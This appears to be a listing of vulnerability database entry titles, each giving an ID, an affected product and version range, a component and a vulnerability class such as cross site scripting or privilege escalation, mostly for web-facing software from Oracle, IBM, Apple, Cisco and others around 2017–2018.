[122097] McAfee Web Gateway 7.8.1.x directory traversal
[122094] Chamilo LMS 11.x Unserialization /webservices/api/v2.php privilege escalation
[122082] IBM Sterling B2B Integrator Standard Edition up to 5.2.6 Web UI cross site scripting
[122081] IBM WebSphere MQ 7.5/8.0/9.0 Message privilege escalation
[122059] mitmproxy 4.0.3 tools/web/app.py DNS Rebinding privilege escalation
[122047] IBM Sterling B2B Integrator Standard Edition up to 2.2.6 Web UI cross site scripting
[122011] cckevincyh SSH CompanyWebsite up to 2018-05-03 fileUploadAction_fileUpload.action privilege escalation
[122010] cckevincyh SSH CompanyWebsite up to 2018-05-03 noticeManageAction_queryNotice.action sql injection
[121971] webEdition CMS up to 6.2.6/6.3.7 Installer setup.php privilege escalation
[121937] Cisco Web Framework cross site scripting
[121936] Cisco Cloud Services Platform 2100 Web Upload privilege escalation
[121933] Cisco WebEx Web Framework DOM-Based cross site scripting
[121932] Cisco WebEx Teams on Windows/macOS privilege escalation
[121931] Cisco WebEx Network Recording Player denial of service
[121930] Cisco WebEx Network Recording Player memory corruption
[121770] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime privilege escalation
[121769] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime privilege escalation
[121768] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime privilege escalation
[121767] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime privilege escalation
[121766] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime privilege escalation
[121765] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime privilege escalation
[121764] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime privilege escalation
[121763] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime privilege escalation
[121725] Oracle Hospitality Cruise Fleet Management System 9.x Gangway Activity Web App privilege escalation
[121723] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 WLS Core Components privilege escalation
[121722] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Portlet Services privilege escalation
[121719] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 SAML privilege escalation
[121717] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 Console privilege escalation
[121712] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Web Server privilege escalation
[121692] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 JSF privilege escalation
[121689] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 WLS Core Components privilege escalation
[121688] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 WLS Web Services privilege escalation
[121687] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 Sample Apps privilege escalation
[121686] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 Console privilege escalation
[121685] Oracle WebCenter Portal 12.2.1.3.0 Security Framework privilege escalation
[121618] Oracle Application Testing Suite 10.1 Load Testing for Web Apps privilege escalation
[121599] Oracle Marketing 12.1.1/12.1.2/12.1.3 User Interface privilege escalation
[121593] Oracle 8.4/15.x/16.x Web Access privilege escalation
[121592] Oracle 8.4/15.x/16.x/17.x Web Access privilege escalation
[121588] Oracle 8.4/15.x/16.x/17.x Web Access privilege escalation
[121587] Oracle 8.4/15.x/16.x/17.x Web Access privilege escalation
[121179] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[121173] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[121134] Moodle up to 3.1.12/3.3.6/3.4.3/3.5.0 Web Service information disclosure
[121127] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[121126] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[121125] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[121123] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[121120] Microsoft Active Directory Federation Services Web Customizations cross site scripting
[121040] Apple watchOS up to 4.3.1 WebKit memory corruption
[121039] Apple watchOS up to 4.3.1 WebKit memory corruption
[121038] Apple watchOS up to 4.3.1 WebKit memory corruption
[121037] Apple watchOS up to 4.3.1 WebKit memory corruption
[121036] Apple watchOS up to 4.3.1 WebKit memory corruption
[121035] Apple watchOS up to 4.3.1 WebKit race condition
[121034] Apple watchOS up to 4.3.1 WebKit privilege escalation
[121033] Apple watchOS up to 4.3.1 WebKit memory corruption
[121026] Apple tvOS up to 11.4.0 WebKit memory corruption
[121025] Apple tvOS up to 11.4.0 WebKit memory corruption
[121024] Apple tvOS up to 11.4.0 WebKit memory corruption
[121023] Apple tvOS up to 11.4.0 WebKit memory corruption
[121022] Apple tvOS up to 11.4.0 WebKit memory corruption
[121021] Apple tvOS up to 11.4.0 WebKit memory corruption
[121020] Apple tvOS up to 11.4.0 WebKit memory corruption
[121019] Apple tvOS up to 11.4.0 WebKit memory corruption
[121018] Apple tvOS up to 11.4.0 WebKit memory corruption
[121017] Apple tvOS up to 11.4.0 WebKit race condition
[121016] Apple tvOS up to 11.4.0 WebKit privilege escalation
[121015] Apple tvOS up to 11.4.0 WebKit 7PK Security Features
[121014] Apple tvOS up to 11.4.0 WebKit memory corruption
[120986] Apple iCloud up to 7.5 on Windows WebKit memory corruption
[120985] Apple iCloud up to 7.5 on Windows WebKit memory corruption
[120984] Apple iCloud up to 7.5 on Windows WebKit memory corruption
[120983] Apple iCloud up to 7.5 on Windows WebKit memory corruption
[120982] Apple iCloud up to 7.5 on Windows WebKit memory corruption
[120981] Apple iCloud up to 7.5 on Windows WebKit memory corruption
[120980] Apple iCloud up to 7.5 on Windows WebKit memory corruption
[120979] Apple iCloud up to 7.5 on Windows WebKit memory corruption
[120978] Apple iCloud up to 7.5 on Windows WebKit memory corruption
[120977] Apple iCloud up to 7.5 on Windows WebKit race condition
[120976] Apple iCloud up to 7.5 on Windows WebKit 7PK Security Features
[120975] Apple iCloud up to 7.5 on Windows WebKit privilege escalation
[120974] Apple iCloud up to 7.5 on Windows WebKit memory corruption
[120934] PHP Scripts Mall Auditor Website 2.0.1 cross site scripting
[120925] Mycroft AI up to 18.2.8b on Linux WebSocket Server privilege escalation
[120479] ADB Broadband Router on Epicentro Command Line Interface privilege escalation
[120294] Schneider Electric U.motion Builder up to 1.3.3 Web Service sql injection
[120243] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120242] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120241] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120240] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120239] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120238] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120237] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120236] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120235] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120234] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120233] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120232] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120231] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120230] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120229] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120228] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120227] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120226] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120225] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120224] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120223] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120222] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120221] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120220] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120219] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120218] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120217] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120216] IBM Rational Quality Manager up to 5.0.2/6.0.6 Web UI cross site scripting
[120215] IBM Rational Quality Manager up to 5.0.2/6.0.5 Web UI cross site scripting
[120169] PRTG Network Monitor up to 18.2.38 Web Console privilege escalation
[120167] IceWarp Mail Server 12.0.3 webdav/ticket/ cross site scripting
[120101] Weblication CMS Core / Grid 12.6.24 wFilemanager.php Persistent cross site scripting
[120096] Zoho ManageEngine Netflow Analyzer Web Server information disclosure
[120091] CMS MaeloStore 1.5.0 Admin Interface Stored cross site scripting
[120040] TIBCO Spotfire Web Player Client privilege escalation
[120038] TIBCO Spotfire Web Player Client privilege escalation
[120037] IBM WebSphere Application Server up to 18.0.0.1 SAML Web SSO information disclosure
[120036] IBM WebSphere MQ 8.0/9.0 SSL Certificate Validator weak authentication
[120005] IBM WebSphere MQ up to 7.1.0.9/7.5.0.8/8.0.0.8/9.0.0.2/9.0.4 Queue Manager privilege escalation
[119990] AXIS IP Camera Interface privilege escalation
[119976] Badge Plugin up to 1.4 on Jenkins Web UI BadgeSummaryAction.java Persistent cross site scripting
[119826] Insteon HD IP Camera White 2864-222 Web Service memory corruption
[119825] Insteon HD IP Camera White 2864-222 Web Service cgi-bin/CGIProxy.fcgi memory corruption
[119824] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 SAML Response information disclosure
[119764] Cisco FXOS/UCS Fabric Interconnect Software Web UI memory corruption
[119657] ovirt-engine up to 4.2.2 Web Console transport.py EventData User information disclosure
[119611] Open-Xchange OX AppSuite up to 7.8.3-rev11/7.8.4-rev8 Office-Web cross site scripting
[119591] IBM WebSphere MQ 8.0/9.0 PAM Module privilege escalation
[119570] McAfee Web Gateway up to 7.8.1.5 JMX Service weak authentication
[119569] Automated Logic WebCTRL 6.0/6.1/6.5 XML External Entity
[119537] NetApp SANtricity Web Services Proxy Java Management Extension privilege escalation
[119510] SensioLabs Symfony 3.3.6 Web Profiler _profiler/open Reflected cross site scripting
[119478] Microsoft Office Web Apps Server/Office Online Server privilege escalation
[119453] Microsoft Windows 10 1709/10 1803/Server 1709/Server 1803 WebDAV privilege escalation
[119373] VMware NSX SD-WAN Edge up to 2.x/3.1.1 Web GUI privilege escalation
[119328] Midnight Coders WebORB for Java 5.1.1.0 AMF3 Deserializer privilege escalation
[119282] PHP Scripts Mall Schools Alert Management Script /webmasterst/general.php privilege escalation
[119250] Cisco WebEx Web Framework cross site scripting
[119249] Cisco WebEx Web Framework cross site scripting
[119248] Cisco Unified Communications Manager Web UI privilege escalation
[119247] Cisco Unity Connection Web Framework cross site scripting
[119246] Cisco Web Security Appliance 10.5.1/10.5.2/11.0.0 Traffic Monitor 7PK Security Features
[119244] Cisco Unified Communications Manager Web Framework cross site scripting
[119233] Cisco Prime Collaboration Provisioning up to 12.1 Web Framework SQL sql injection
[119224] Cisco Integrated Management Controller Web-based Management Console DOM cross site scripting
[119147] wintiwebdev on Node.js URL directory traversal
[119075] pooledwebsocket on Node.js URL directory traversal
[118972] Git Plugin up to 3.9.0 on Jenkins AssemblaWeb.java privilege escalation
[118852] webdriver-launcher on Node.js Download weak encryption
[118749] Apple iCloud up to 7.4 on Windows WebKit information disclosure
[118748] Apple iCloud up to 7.4 on Windows WebKit memory corruption
[118747] Apple iCloud up to 7.4 on Windows WebKit privilege escalation
[118746] Apple iCloud up to 7.4 on Windows WebKit privilege escalation
[118745] Apple iCloud up to 7.4 on Windows WebKit memory corruption
[118744] Apple iCloud up to 7.4 on Windows WebKit memory corruption
[118743] Apple iCloud up to 7.4 on Windows WebKit memory corruption
[118742] Apple iCloud up to 7.4 on Windows WebKit memory corruption
[118741] Apple iCloud up to 7.4 on Windows WebKit privilege escalation
[118740] Apple iCloud up to 7.4 on Windows WebKit memory corruption
[118739] Apple iCloud up to 7.4 on Windows WebKit memory corruption
[118738] Apple iCloud up to 7.4 on Windows WebKit race condition
[118737] Apple iCloud up to 7.4 on Windows WebKit Data Processing Error
[118733] Apple watchOS up to 4.3.0 WebKit information disclosure
[118732] Apple watchOS up to 4.3.0 WebKit memory corruption
[118731] Apple watchOS up to 4.3.0 WebKit memory corruption
[118730] Apple watchOS up to 4.3.0 WebKit memory corruption
[118729] Apple watchOS up to 4.3.0 WebKit privilege escalation
[118728] Apple watchOS up to 4.3.0 WebKit memory corruption
[118727] Apple watchOS up to 4.3.0 WebKit race condition
[118697] Apple tvOS up to 11.3 WebKit information disclosure
[118696] Apple tvOS up to 11.3 WebKit information disclosure
[118695] Apple tvOS up to 11.3 WebKit memory corruption
[118694] Apple tvOS up to 11.3 WebKit privilege escalation
[118693] Apple tvOS up to 11.3 WebKit memory corruption
[118692] Apple tvOS up to 11.3 WebKit memory corruption
[118691] Apple tvOS up to 11.3 WebKit memory corruption
[118690] Apple tvOS up to 11.3 WebKit memory corruption
[118689] Apple tvOS up to 11.3 WebKit privilege escalation
[118688] Apple tvOS up to 11.3 WebKit memory corruption
[118687] Apple tvOS up to 11.3 WebKit memory corruption
[118686] Apple tvOS up to 11.3 WebKit race condition
[118685] Apple tvOS up to 11.3 WebKit Data Processing Error
[118540] dwebp-bin on Node.js Download weak encryption
[118515] grunt-webdriver-qunit on Node.js Download weak encryption
[118510] webrtc-native on Node.js weak encryption
[118496] nodewebkit on Node.js Download weak encryption
[118427] ws up to 1.1.0 on Node.js WebSocket privilege escalation
[118417] console-io up to 2.2.13 on Node.js Web Console weak authentication
[118414] Droppy up to 3.4.x on Node.js WebSocket Cross-Domain cross site request forgery
[118383] TP-LINK TL-IPC40A-4 websys.lua weak authentication
[118377] Synacor Zimbra Collaboration up to 8.7.11 Patch 3/8.8.8 Patch 3 Web Client Persistent cross site scripting
[118324] webdrvr on Node.js Download weak encryption
[118300] Jsonwebtoken Module up to 4.2.1 on Node.js Token weak encryption
[118295] IBM Security Guardium Big Data Intelligence 3.1 Web UI cross site scripting
[118260] PHP Scripts Mall Website Seller Script 2.0.3 user_submit.php cross site request forgery
[118205] Fortinet FortiOS up to 5.6.2 SSL VPN Web Portal information disclosure
[118195] BeaconMedaes Scroll Medical Air Systems TotalAlert Web Application privilege escalation
[118194] BeaconMedaes Scroll Medical Air Systems TotalAlert Web Application Credentials privilege escalation
[118155] IBM Tivoli Application Dependency Discovery Manager up to 7.1.2/7.2.1.4 AXIS Webapp happyaxis.jsp information disclosure
[118110] HP Service Manager Software Web Tier up to 9.51 sql injection
[118076] Joomla CMS up to 3.8.7 Web Install Application Password privilege escalation
[117846] Cisco Unified Communications Manager Web Framework cross site scripting
[117844] Cisco TelePresence Server Web UI privilege escalation
[117828] Squid Web Proxy 3.5.27-20180318 sslBumpAccessCheck denial of service
[117803] Solarwinds Serv-U up to 15.1.6 /Web%20Client/ denial of service
[117709] Moxa EDR-810 4.1 Build 17030317 Web Server /MOXA_LOG.ini denial of service
[117708] Moxa EDR-810 4.1 Build 17030317 Web Server /MOXA_CFG2.ini denial of service
[117707] Moxa EDR-810 4.1 Build 17030317 Web Server /MOXA_CFG.ini denial of service
[117706] Moxa EDR-810 4.1 Build 17030317 Web Server net_Web_get_value privilege escalation
[117705] Moxa EDR-810 4.1 Build 17030317 Web Server net_Web_get_value privilege escalation
[117704] Moxa EDR-810 4.1 Build 17030317 Web Server net_Web_get_value privilege escalation
[117703] Moxa EDR-810 4.1 Build 17030317 Web Server Password weak encryption
[117700] Moxa EDR-810 4.1 Build 17030317 Web Server cross site request forgery
[117699] Moxa EDR-810 4.1 Build 17030317 Web Server /goform/net_WebCSRGen privilege escalation
[117698] Moxa EDR-810 4.1 Build 17030317 Web Server privilege escalation
[117697] Moxa EDR-810 4.1 Build 17030317 Web Server Credentials privilege escalation
[117696] Moxa EDR-810 4.1 Build 17030317 Web Server /goform/WebRSAKEYGen privilege escalation
[117695] Moxa EDR-810 4.1 Build 17030317 Web Server net_WebPingGetValue privilege escalation
[117662] D-Link DIR-816 A2 CN 1.10B05 GoAhead Web Server websRedirect memory corruption
[117653] D-Link DIR-629-B1 /htdocs/cgibin weblogin_log memory corruption
[117559] Microsoft Exchange Server 2016 CU8/2016 CU9 Outlook Web Access privilege escalation
[117503] Microsoft Exchange Server 2013 CU19/2013 CU20/2016 CU8/2016 CU9 Outlook Web Access privilege escalation
[117500] Microsoft Exchange Server 2016 CU8/2016 CU9 Outlook Web Access privilege escalation
[117406] IBM Cognos Analytics 11.0 Web UI cross site scripting
[117358] JavaScript WebGL API GPU Memory Module 7PK Security Features
[117356] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Administrative Console information disclosure
[117302] Cisco WebEx Recording Format Player information disclosure
[117301] Cisco WebEx Network Recording Player ARF Player privilege escalation
[117300] Cisco IOS XR netconf Interface denial of service
[117295] Cisco WebEx Network Recording Player up to T31.23.3 ARF Player privilege escalation
[117290] Cisco Aironet 3800 8.5.100.0 Central Web Authentication privilege escalation
[117288] Cisco Wireless LAN Controller up to 8.5.110.0 on IOS WebAuth Client weak authentication
[117232] IBM API Connect up to 5.0.8.2 Web UI cross site scripting
[117190] IBM BigFix Platform 9.2/9.5 Web UI cross site request forgery
[117188] IBM BigFix Platform 9.2/9.5 Web UI cross site scripting
[117177] Webdorado Form Maker by WD up to 1.12.23 on WordPress privilege escalation
[117155] ovirt-engine up to 4.1.11.1/4.2.2.4 API/Administration Web Portal Credentials privilege escalation
[117147] IBM Security QRadar SIEM 7.2/7.3 Web UI cross site scripting
[117125] Advantech WebAccess HMI Designer 2.1.7.32 memory corruption
[117124] Advantech WebAccess HMI Designer 2.1.7.32 pm3 File memory corruption
[117123] Advantech WebAccess HMI Designer 2.1.7.32 pm3 File memory corruption
[117122] GitLab Community Edition/Enterprise Edition up to 10.2 Webhooks privilege escalation
[117118] IBM Jazz Reporting Service up to 5.0.2/6.0.5 Web UI cross site scripting
[117092] IBM Jazz Reporting Service up to 5.0.2/6.0.5 Web UI cross site scripting
[116974] Web-Dorado Instagram Feed WD Plugin up to 1.3.0 on WordPress cross site scripting
[116973] Web-Dorado Instagram Feed WD Plugin up to 1.3.0 on WordPress cross site scripting
[116969] IBM WebSphere MQ up to 8.0.0.8/9.0.4 denial of service
[116965] IBM Cognos Business Intelligence 10.2/10.2.1/10.2.1.1/10.2.2 Web UI cross site scripting
[116939] Easy File Sharing Web Server 7.2 EFS privilege escalation
[116885] Cisco Unified Communications Manager Web Framework information disclosure
[116878] Cisco ASA Web Server Authentication Required cross site scripting
[116863] Cisco WebEx Business Suite Client SWF File privilege escalation
[116847] IBM Sterling B2B Integrator 5.1/5.2 ActiveMQ Admin User Interface weak authentication
[116839] Oracle Secure Global Desktop 5.3 Web Server memory corruption
[116824] Oracle Agile PLM Framework 5.2 Web Client privilege escalation
[116698] Oracle Access Manager 10.1.4.3.0/11.1.2.3.0/12.2.1.3.0 Web Server Plugin privilege escalation
[116694] Oracle WebLogic Server 12.2.1.3 WLS Security privilege escalation
[116691] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.2.0 Advanced UI privilege escalation
[116687] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 Sample Apps privilege escalation
[116686] Oracle WebCenter Sites 11.1.1.8.0 Advanced UI privilege escalation
[116685] Oracle WebCenter Portal 12.2.1.2.0/12.2.1.3.0 Security Framework privilege escalation
[116683] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.2.0/12.2.1.3.0 Advanced UI privilege escalation
[116682] Oracle WebCenter Content 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Content Server privilege escalation
[116679] Oracle WebLogic Portal 10.3.6.0.0 privilege escalation
[116675] Oracle Access Manager 10.1.4.3.0/11.1.2.3.0/12.2.1.3.0 Web Server Plugin privilege escalation
[116673] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 WLS Core Components privilege escalation
[116672] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 WL Diagnostics Framework privilege escalation
[116671] Oracle WebCenter Portal 12.2.1.2.0/12.2.1.3.0 Security Framework privilege escalation
[116618] Oracle Application Testing Suite 12.5.0.3/13.1.0.1/13.2.0.1 Load Testing for Web Apps privilege escalation
[116603] Oracle up to 16.2/17.12 Web Access privilege escalation
[116599] Oracle Communications Order/Service Management 7.2.4.3.0/7.3.0.1.x/7.3.1.0.7/7.3.5.0.x WebUI privilege escalation
[116587] Schneider Electric BMXNOR0200 Web Services memory corruption
[116582] Schneider Electric 66074 MGE Network Management Card Integrated Web Server privilege escalation
[116581] Schneider Electric 66074 MGE Network Management Card Integrated Web Server privilege escalation
[116302] TIBCO JasperReports up to 6.2.4 Spring Web Flows directory traversal
[116299] IBM WebSphere Portal up to 8.0.0.1/8.5/9.0 Web UI cross site scripting
[116298] IBM WebSphere MQ 8.0.0.8/9.0.0.2/9.0.4 Queue Manager privilege escalation
[116228] D-Link DIR-815 up to 2.07.B01 /htdocs/web/getcfg.php information disclosure
[116209] PHP Scripts Mall Website Broker Script 3.0.6 My Profile cross site scripting
[116208] PHP Scripts Mall Website Seller Script 2.0.3 privilege escalation
[116207] PHP Scripts Mall Website Seller Script 2.0.3 Listing Search Feature Reflected cross site scripting
[116144] D-Link DIR-815 up to 2.03 Remote Administration Interface privilege escalation
[116117] IBM WebSphere Portal 8.5/9.0 Web UI cross site scripting
[116106] CMS Made Simple 2.2.7 moduleinterface.php Reflected cross site scripting
[116105] CMS Made Simple 2.2.7 moduleinterface.php cross site request forgery
[116103] CMS Made Simple 2.2.7 moduleinterface.php Reflected cross site scripting
[115955] IBM WebSphere MQ up to 7.5.0.5/8.0.0.2 information disclosure
[115809] IBM WebSphere DataPower Appliance up to 7.6 XML XML External Entity
[115665] Ruby up to 2.2.9/2.3.6/2.4.3/2.5.0 WEBrick Server denial of service
[115611] Apple watchOS up to 4.1 WebKit memory corruption
[115610] Apple tvOS up to 11.1 WebKit memory corruption
[115608] Apple iCloud up to 7.1 on Windows WebKit memory corruption
[115605] Apple watchOS up to 4.1 WebKit Redirect
[115604] Apple tvOS up to 11.1 WebKit Redirect
[115602] Apple iCloud up to 7.1 on Windows WebKit Redirect
[115587] Apple tvOS up to 11.1 WebKit memory corruption
[115585] Apple iCloud up to 7.1 on Windows WebKit memory corruption
[115583] Apple watchOS up to 4.1 WebKit memory corruption
[115582] Apple tvOS up to 11.1 WebKit memory corruption
[115580] Apple iCloud up to 7.1 on Windows WebKit memory corruption
[115551] Apple tvOS up to 10.1 WebKit information disclosure
[115550] Apple iCloud up to 6.1 on Windows WebKit information disclosure
[115488] Apple iCloud up to 7.3 on Windows WebKit information disclosure
[115487] Apple iCloud up to 7.3 on Windows WebKit memory corruption
[115486] Apple iCloud up to 7.3 on Windows WebKit privilege escalation
[115485] Apple iCloud up to 7.3 on Windows WebKit memory corruption
[115484] Apple iCloud up to 7.3 on Windows WebKit memory corruption
[115483] Apple iCloud up to 7.3 on Windows WebKit memory corruption
[115482] Apple iCloud up to 7.3 on Windows WebKit memory corruption
[115481] Apple iCloud up to 7.3 on Windows WebKit memory corruption
[115480] Apple iCloud up to 7.3 on Windows WebKit memory corruption
[115479] Apple iCloud up to 7.3 on Windows WebKit memory corruption
[115478] Apple iCloud up to 7.3 on Windows WebKit memory corruption
[115477] Apple iCloud up to 7.3 on Windows WebKit memory corruption
[115476] Apple iCloud up to 7.3 on Windows WebKit memory corruption
[115475] Apple iCloud up to 7.3 on Windows WebKit memory corruption
[115474] Apple iCloud up to 7.3 on Windows WebKit memory corruption
[115473] Apple iCloud up to 7.3 on Windows WebKit memory corruption
[115472] Apple iCloud up to 7.3 on Windows WebKit memory corruption
[115471] Apple iCloud up to 7.3 on Windows WebKit memory corruption
[115470] Apple iCloud up to 7.3 on Windows WebKit memory corruption
[115389] Apple tvOS up to 11.2 WebKit memory corruption
[115388] Apple tvOS up to 11.2 WebKit memory corruption
[115387] Apple tvOS up to 11.2 WebKit memory corruption
[115386] Apple tvOS up to 11.2 WebKit memory corruption
[115385] Apple tvOS up to 11.2 WebKit memory corruption
[115384] Apple tvOS up to 11.2 WebKit memory corruption
[115383] Apple tvOS up to 11.2 WebKit memory corruption
[115382] Apple tvOS up to 11.2 WebKit memory corruption
[115381] Apple tvOS up to 11.2 WebKit memory corruption
[115380] Apple tvOS up to 11.2 WebKit memory corruption
[115379] Apple tvOS up to 11.2 WebKit memory corruption
[115378] Apple tvOS up to 11.2 WebKit memory corruption
[115377] Apple tvOS up to 11.2 WebKit memory corruption
[115376] Apple tvOS up to 11.2 WebKit memory corruption
[115375] Apple tvOS up to 11.2 WebKit memory corruption
[115374] Apple tvOS up to 11.2 WebKit memory corruption
[115373] Apple tvOS up to 11.2 WebKit memory corruption
[115372] Apple tvOS up to 11.2 WebKit Reachable Assertion
[115361] Apple watchOS up to 4.2 WebKit information disclosure
[115360] Apple watchOS up to 4.2 WebKit memory corruption
[115359] Apple watchOS up to 4.2 WebKit memory corruption
[115358] Apple watchOS up to 4.2 WebKit memory corruption
[115357] Apple watchOS up to 4.2 WebKit memory corruption
[115356] Apple watchOS up to 4.2 WebKit memory corruption
[115355] Apple watchOS up to 4.2 WebKit memory corruption
[115354] Apple watchOS up to 4.2 WebKit memory corruption
[115353] Apple watchOS up to 4.2 WebKit memory corruption
[115352] Apple watchOS up to 4.2 WebKit memory corruption
[115351] Apple watchOS up to 4.2 WebKit Reachable Assertion
[115263] IBM Financial Transaction Manager 3.0/3.0.2/3.0.2.1 Web UI cross site scripting
[115262] IBM Business Process Manager 8.6 Web UI cross site scripting
[115249] IBM Business Process Manager 8.6 Web UI cross site scripting
[115245] IBM WebSphere MQ up to 9.0.4 Message privilege escalation
[114953] IBM Jazz Foundation Web UI cross site scripting
[114952] IBM Jazz Foundation Web UI cross site scripting
[114951] IBM Jazz Foundation Web UI cross site scripting
[114910] Webproxy 1.7.8 directory traversal
[114896] IBM WebSphere Application Server 9 Form Login privilege escalation
[114851] GitLab Community Edition up to 10.3 Web Hook privilege escalation
[114766] Kentico CMS up to 10.0.49/11.0.4 Administration Interface sql injection
[114720] OpenVPN up to 2.4.5 Management Interface Format String
[114628] Webmin 1.840/1.880 Default Configuration /etc/shadow directory traversal
[114607] OSIsoft PI Web API up to 2017 R2 cross site scripting
[114605] OSIsoft PI Web API up to 2017 R2 Service Account privilege escalation
[114599] Unitrends Backup up to 10.0.x User Interface /api/hosts weak authentication
[114579] Microsoft Exchange Server up to 2017 CU8 Outlook Web Access information disclosure
[114571] Microsoft Exchange Server 2016 CU7/2016 CU8 Outlook Web Access information disclosure
[114570] Microsoft Exchange Server 2010 SP3/2013 CU18/2013 CU19/2016 CU7/2016 CU8 Outlook Web Access Fake information disclosure
[114473] IBM WebSphere Portal 8.5/9.0 Web UI cross site scripting
[114419] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Administrative Console information disclosure
[114394] oVirt 4.2.0/4.2.1/4.2.2 Web Admin Application cross site scripting
[114367] CMS Made Simple 2.2.6 moduleinterface.php cross site scripting
[114363] CMS Made Simple 2.2.6 moduleinterface.php Stored cross site scripting
[114341] WebLog Expert Web Server Enterprise 9.4 Service Port 9991 Data Processing Error
[114335] Schneider Electric Pelco Sarix Professional up to 3.29 Web-based GUI memory corruption
[114198] Cisco Web Security Appliance 10.5.1 FTP Server weak authentication
[114020] Novell eDirectory up to 9.0.3.0 LDAP Interface weak encryption
[113977] SAP NetWeaver Portal/WebDynpro Java 7.30/7.31/7.40/7.50 cross site scripting
[113909] IBM WebSphere Portal 7.0/8.0/8.5/9.0 Web UI cross site scripting
[113803] uTorrent Web HTTP RPC Server privilege escalation
[113705] IBM Maximo Asset Management 7.6 Web UI cross site scripting
[113688] Asterisk HTTP Server res_http_websocket.c Data Processing Error
[113676] Cisco Prime Collaboration Provisioning Tool Web Portal privilege escalation
[113663] IBM Maximo Anywhere 7.5/7.6 Web UI cross site scripting
[113484] 3S-Smart CODESYS Web Server memory corruption
[113275] SAP HANA 1.00/2.00 SQL Interface Memory information disclosure
[113274] SAP CRM WebClient UI up to 8.01 cross site scripting
[113267] IBM Connections 4.0/4.5/5.0/5.5/6.0 Web UI cross site scripting
[113209] PHP Scripts Mall News Website Script 2.0.4 Search sql injection
[113189] Advantech WebAccess 8.3.0 Node\AspVBObj.dll VBWinExec privilege escalation
[113124] LibreOffice up to 6.0.1 COM.MICROSOFT.WEBSERVICE File privilege escalation
[113108] IBM WebSphere Portal 8.0/8.5/9.0 Web UI cross site scripting
[113064] IBM WebSphere Portal 7.0/8.0/8.5/9.0 Web UI cross site scripting
[113002] IBM WebSphere Application Server up to 6.1.0.42/7.0.0.20/8.0.0.1 Virtual Member Manager javax.naming.directory.AttributeInUseException 7PK Security Features
[112981] Cisco Unified Communications Manager Web Framework sql injection
[112977] Cisco UCS Central Software up to 2.0 User Interface privilege escalation
[112967] IBM API Connect 5.0.0.0 Web UI cross site scripting
[112837] West Wind Web Server 6.x /ADMIN.ASP weak authentication
